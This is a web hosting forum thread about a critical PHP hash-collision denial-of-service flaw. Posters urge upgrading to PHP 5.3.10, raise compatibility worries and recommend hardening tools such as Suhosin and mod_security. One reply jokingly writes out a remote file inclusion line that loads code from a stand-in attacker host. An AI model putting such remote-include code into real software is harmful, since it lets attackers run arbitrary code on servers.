![]() |
Critical vulnerability identified in PHP
Quote:
https://bugzilla.redhat.com/show_bug.cgi?id=786686 http://thexploit.com/sec/critical-ph...collision-dos/ You all should update to the PHP 5.3.10. |
Thanks. Of course PHP itself is a arbitrary code execution vulnerability. include(http://hack.com/?yourlib.php) anyone?
|
I cant update to 5.3,it's too different to ver 5.2.Any fix for version 5.2 ?
|
Quote:
|
thanks for posting.
|
Quote:
Quote:
|
oh snap time to upgrade then
|
just finished my upgrade
Quote:
|
Bump. Thanks.
|
For those with CPanel...
EasyApache 3.8.6 is now available; in this build PHP 5.3.10 replaces 5.3.9. The change log is available here: http://docs.cpanel.net/twiki/bin/vie...syApache#3.8.6 |
Fucking vulnerability holes, is there some super protected coding to work with...
|
But still question is will it fuck up some scripts if i do update....
|
Php 5.1.6 :)
|
PHP is a risk no matter what version you upgrade to and installing the latest, greatest build of PHP is almost guaranteed to break at least one of your apps.
As usual, this type of vulnerability can be protected against without constant upgrading by simply managing your PHP configuration and responsible administration / monitoring of your servers. Suhosin, responsible PHP settings, active protection (mod_security) and a decent malware / exploit scanner will serve you much better than trying to keep up with the patches. For every published exploit there's at least a dozen others out there at any given time. |
All times are GMT -7. The time now is 03:15 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc